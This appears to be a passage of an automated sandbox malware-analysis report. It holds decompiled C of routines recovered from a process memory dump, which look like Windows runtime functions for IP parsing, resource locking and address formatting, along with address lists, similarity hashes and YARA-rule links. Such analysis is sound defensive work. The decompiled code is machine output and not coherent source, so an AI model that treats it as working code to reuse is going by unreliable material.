								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x025d0b21
0x025d0b24
0x025d0b27
0x025d0b2a
0x025d0b2d
0x025d0b30
0x025d0b33
0x025d0b36
0x025d0b39
0x025d0b3e
0x025d0c65
0x025d0c68
0x025d0c6a
0x025d0c6f
0x025feb42
0x00000000
0x00000000
0x025feb48
0x025feb48
0x025d0c75
0x025d0c7a
0x025feb54
0x00000000
0x00000000
0x00000000
0x025feb5a
0x025d0c80
0x025d0c84
0x025feb98
0x00000000
0x00000000
0x025feba6
0x025d0cb8
0x025d0cba
0x025d0cd3
0x025d0cda
0x025d0ce4
0x025d0ce9
0x00000000
0x025d0cec
0x025d0c8c
0x025feb63
0x00000000
0x00000000
0x025feb70
0x025feb75
0x025feb7d
0x00000000
0x00000000
0x025feb8c
0x00000000
0x025feb8c
0x025d0c96
0x00000000
0x00000000
0x025d0ca2
0x025d0cac
0x025d0cb4
0x00000000
0x00000000
0x025d0b44
0x025d0b47
0x025d0b49
0x00000000
0x00000000
0x025d0b4f
0x025d0b50
0x00000000
0x00000000
0x025d0b56
0x025d0b62
0x025d0b7c
0x025d0bac
0x025d0a0f
0x025feaaa
0x00000000
0x025feac4
0x025feac4
0x025d0bd0
0x025d0bd0
0x025d0bd4
0x025d0bd9
0x00000000
0x00000000
0x025d0bdb
0x025d0be0
0x025feb0e
0x025d0a1a
0x00000000
0x025d0a1a
0x025feb1a
0x025feb1f
0x025feb27
0x00000000
0x00000000
0x025feb36
0x00000000
0x025feb36
0x025d0bea
0x00000000
0x00000000
0x025d0bf6
0x025d0c00
0x025d0c03
0x025d0c0b
0x00000000
0x025d0c0b
0x025feaaa
0x00000000
0x025d0a15
0x025d0bb6
0x00000000
0x025d0bc6
0x025d0bc6
0x025d0bcb
0x025d0c15
0x00000000
0x00000000
0x025d0c1d
0x025d0c20
0x025d0c21
0x025d0c24
0x025d0c24
0x025d0c26
0x00000000
0x025d0c26
0x025d0bcd
0x00000000
0x025d0bcd
0x025d0b89
0x025d0b89
0x025d0b90
0x00000000
0x00000000
0x025d0b96
0x00000000
0x025d0b96
0x025d0a04
0x025d0a04
0x025d0b9a
0x025d0b9a
0x025d0b9b
0x025d0b9f
0x00000000
0x00000000
0x00000000
0x025d0ba5
0x025d0ac7
0x025d0aca
0x025feacf
0x00000000
0x025feade
0x025feade
0x025feae3
0x00000000
0x00000000
0x025feaf3
0x025feaf6
0x025feaf7
0x025feafe
0x025feb01
0x00000000
0x025feb01
0x025feacf
0x025d0ad0
0x025d0ad4
0x00000000
0x00000000
0x025d0ada
0x025d0ae6
0x025d0c34
0x00000000
0x025d0c47
0x025d0c49
0x025d0c4a
0x025d0c4e
0x025d0c51
0x025d0c54
0x025d0c57
0x025d0c5a
0x00000000
0x00000000
0x00000000
0x025d0c60
0x025d0afb
0x025d0afe
0x025d0b02
0x025d0b05
0x025d0b08
0x00000000
0x025d0b08
0x025d0ae6
0x025d0b44
0x025d09f8
0x025d09f8
0x025d09f9
0x00000000
0x00000000
0x025feaa0
0x00000000

APIs

__fassign.LIBCMT ref: 025D0BF6
__fassign.LIBCMT ref: 025D0CA2

Strings

., xrefs: 025D0A0C
:, xrefs: 025D0BA9
:, xrefs: 025D0AC7

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59

Uniqueness

Uniqueness Score: -1.00%

Function 025D0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E025D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
									_push(_t144);
									_push(0);
									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0261217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
												_push(_t138);
												_push(0);
												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0261217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E025E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E025B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E025B5329(_t110, _t138);
																return E025B53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x025d055a
0x025d055d
0x025d0563
0x025d0566
0x025d05d8
0x025d05e2
0x025d05e5
0x00000000
0x025d05e7
0x025d05e7
0x025d05ea
0x025d05f3
0x025d05f3
0x025d0568
0x025d0568
0x025d0568
0x025d0569
0x025d0569
0x025d0569
0x025d056b
0x00000000
0x00000000
0x025f217f
0x025f2183
0x025f225b
0x025f225f
0x025f2189
0x025f218c
0x025f218f
0x025f2194
0x025f2199
0x025f219d
0x025f21a0
0x025f21a2
0x025f21ce
0x025f21ce
0x025f21ce
0x025f21d0
0x025f21d6
0x025f21de
0x025f21e2
0x025f21e8
0x025f21e9
0x025f21ec
0x025f21f1
0x025f21f6
0x00000000
0x00000000
0x025f21f8
0x025f21fb
0x025f2206
0x025f220b
0x025f220c
0x025f2217
0x025f2226
0x025f222b
0x025f222c
0x025f222f
0x025f2232
0x025f2235
0x025f2235
0x025f223a
0x025f223f
0x025f2241
0x025f2243
0x025f2248
0x025f2248
0x025f224d
0x025f224f
0x025f2262
0x025f2263
0x025f2268
0x025f2269
0x025f2269
0x025f2269
0x025f226d
0x00000000
0x00000000
0x025f2276
0x025f2279
0x025f227e
0x025f2283
0x025f2287
0x025f228a
0x025f228d
0x025f228f
0x025f22bc
0x025f22bc
0x025f22bc
0x025f22be
0x025f22c4
0x025f22cc
0x025f22d0
0x025f22d6
0x025f22d7
0x025f22da
0x025f22df
0x025f22e4
0x00000000
0x00000000
0x025f22e6
0x025f22e9
0x025f22f4
0x025f22f9
0x025f22fa
0x025f2305
0x025f2314
0x025f2319
0x025f231a
0x025f231d
0x025f2320
0x025f2323
0x025f2323
0x025f2328
0x025f232d
0x025f232f
0x025f2331
0x025f2336
0x025f2336
0x025f233b
0x025f233d
0x025f2350
0x025f2351
0x025f2356
0x025f2359
0x025f2359
0x025f235b
0x025f235d
0x025b5367
0x025b536b
0x025b5372
0x00000000
0x00000000
0x00000000
0x00000000
0x025f2363
0x025f2363
0x025f2369
0x025f236a
0x025f236c
0x025f2371
0x025f2373
0x00000000
0x025f2379
0x025f2379
0x025f237a
0x025f237f
0x025f237f
0x025f2385
0x025f2386
0x025f2389
0x025f238e
0x025f2390
0x025b5378
0x025b537c
0x025f2396
0x025f2396
0x025f2397
0x025f239c
0x025f23a2
0x025f23a3
0x025f23a6
0x025f23ab
0x025f23ad
0x00000000
0x025f23b3
0x025f23b3
0x025f23b4
0x025f23b9
0x025f23ba
0x025f23ba
0x025f23bc
0x025f23bf
0x00000000
0x00000000
0x025e9153
0x025e9158
0x025e915a
0x025e915e
0x025e9160
0x00000000
0x025e9166
0x025e9166
0x025e9171
0x025e9176
0x025e9176
0x00000000
0x025e9160
0x025f23c6
0x025f23d7
0x025f23d7
0x025f23ad
0x025f2390
0x025f2373
0x025f233f
0x025f233f
0x00000000
0x025f233f
0x025f2291
0x025f2291
0x025f2293
0x025f2295
0x025f229a
0x025f22a1
0x025f22a3
0x025f22a7
0x025f22a9
0x00000000
0x00000000
0x025f22ab
0x025f22ad
0x025f22af
0x00000000
0x00000000
0x00000000
0x025f22af
0x025f22b1
0x025f22b4
0x025f22b4
0x025f22b6
0x025b53be
0x025b53be
0x025b53be
0x025b53c0
0x00000000
0x00000000
0x025b53cb
0x025b53ce
0x025b53d0
0x025b53d4
0x025b53d6
0x00000000
0x025b53d8
0x025b53e3
0x025b53ea
0x025b53ea
0x00000000
0x025b53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x025f22b6
0x00000000
0x025f228f
0x025f2349
0x025f234d
0x025f2251
0x025f2251
0x00000000
0x025f2251
0x025f21a4
0x025f21a4
0x025f21a6
0x025f21a8
0x025f21ac
0x025f21b6
0x025f21b8
0x025f21bc
0x025f21be
0x00000000
0x00000000
0x025f21c0
0x025f21c2
0x025f21c4
0x00000000
0x00000000
0x00000000
0x025f21c4
0x025f21c6
0x025f21c6
0x025f21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x025f21c8
0x025f21a2
0x00000000
0x025f2183
0x025d057b
0x025d057d
0x025d0581
0x025d0583
0x025f2178
0x00000000
0x025d0589
0x025d058f
0x025d058f
0x025d0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206

Strings

RTL: Re-Waiting, xrefs: 025F223A, 025F2328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 025F220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
RTL: Resource at %p, xrefs: 025F221D, 025F230B

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
Instruction ID: e559f2022885c17d6733b422d06019f28312ce942c3b0d09baf0c36be4b6b020
Opcode Fuzzy Hash: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
Instruction Fuzzy Hash: A6514E717002026FEF54CE18CC81F6637AABFC4724F214259ED59DB284EA71EC418B9C

Uniqueness

Uniqueness Score: -1.00%

Function 025D14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2672088; // 0x77fdf0e4
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E025C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02592340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x025d14c0
0x025d14cb
0x025d14d2
0x025d14d6
0x025d14da
0x025d14de
0x025d14e3
0x025d157a
0x025d157a
0x025d14f1
0x025d14f3
0x025fea0f
0x00000000
0x025fea15
0x00000000
0x025fea15
0x025d14f9
0x025d14f9
0x025d14fe
0x025d1504
0x025fea1a
0x025fea1f
0x025fea21
0x025fea22
0x025fea27
0x025fea2a
0x025fea2a
0x025d1515
0x025d1517
0x025d156d
0x025d1572
0x025d1575
0x025d1575
0x025d151e
0x025fea50
0x025fea55
0x025fea58
0x025fea58
0x025d152e
0x025d1531
0x025d1533
0x00000000
0x025d1535
0x025d1541
0x025d1549
0x025d1549
0x025d1533
0x025d14f3
0x025d1559

APIs

___swprintf_l.LIBCMT ref: 025FEA22

Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490

___swprintf_l.LIBCMT ref: 025D156D

Strings

%%%u, xrefs: 025D1564
]:%u, xrefs: 025FEA47

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
Instruction ID: a9bc11d2ca549dc150ee0cb901926fcf7bdb088ca6e9439160f7912521eb5c13
Opcode Fuzzy Hash: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
Instruction Fuzzy Hash: B421E372900619ABDF30DE68CC41AEE77ACBB54300F448426ED4AD3100EB75AE58CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 025B53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E025B53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
									_push(_t92);
									_push(0);
									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0261217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025E3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E025B5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E025B5329(_t74, _t92);
													_push(1);
													return E025B53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x025b53ab
0x025b53ae
0x025b53b1
0x025b53b4
0x025b53b7
0x025d05b6
0x025d05c0
0x025d05c3
0x00000000
0x025d05c9
0x025d05c9
0x025d05cc
0x025d05d5
0x025d05d5
0x025b53bd
0x025b53bd
